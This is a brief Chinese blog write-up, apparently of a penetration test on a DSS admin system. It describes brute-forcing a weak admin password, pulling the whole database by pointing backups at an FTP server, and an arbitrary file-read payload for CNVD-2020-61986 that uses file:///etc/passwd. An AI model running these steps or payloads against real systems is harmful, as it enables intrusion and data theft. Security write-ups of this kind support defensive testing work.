对资产目录进行扫描,发现其dss后台系统登录界面,对其进行了弱密码爆破,成功获取到管理管理员的账号密码。
右上角登录到配置界面,管理员账号密码通用。在数据库配置界面可以配置数据库异地备份,配置ftp服务器后,可以获取数据库所有数据。
既然都进来了,那就顺便看一下历史漏洞,找到一个CNVD-2020-61986,动手测试。
通过协议flie://对服务器文件进行下载。
payload:http(s)://ip
/itc/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
至于漏洞修复相关请到官网查询
6 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!